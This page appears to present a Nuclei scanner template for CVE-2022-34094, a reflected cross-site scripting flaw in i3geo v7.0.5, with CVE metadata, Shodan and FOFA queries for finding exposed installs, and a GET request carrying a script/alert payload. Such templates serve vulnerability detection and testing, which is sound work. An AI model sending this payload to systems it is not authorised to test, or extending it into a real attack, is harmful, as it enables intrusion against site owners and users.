Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting

ID: CVE-2022-34094

Severity: medium

Author: r3Y3r53

Tags: cve2022,cve,i3geo,xss,softwarepublico

Description

Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via request_token.php.

YAML Source

id: CVE-2022-34094

info:
  name: Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    Portal do Software Publico Brasileiro i3geo v7.0.5 was discovered to contain a cross-site scripting (XSS) vulnerability via request_token.php.
  reference:
    - https://github.com/edmarmoretti/i3geo/issues/5
    - https://nvd.nist.gov/vuln/detail/CVE-2022-34093
    - https://owasp.org/www-community/attacks/xss/
    - https://softwarepublico.gov.br/social/i3geo
    - https://github.com/wagnerdracha/ProofOfConcept
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-34094
    cwe-id: CWE-79
    epss-score: 0.00258
    epss-percentile: 0.65535
    cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: softwarepublico
    product: i3geo
    shodan-query: http.html:"i3geo"
    fofa-query: body="i3geo"
  tags: cve2022,cve,i3geo,xss,softwarepublico

http:
  - method: GET
    path:
      - "{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/request_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "%3Cscript%3Ealert(document.domain)%3C/script%3E", "Invalid consumer key")'
        condition: and
# digest: 4b0a00483046022100c724ddaa84c37c94bcf6b9f4fe830373155e68fa8c0ba8c20d8c4189d538bf0e0221009d338f03313b81dfe980fcf1b9d662d7f6164a0ea3c52ce740355c7812e1e880:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-34094.yaml"

View on Github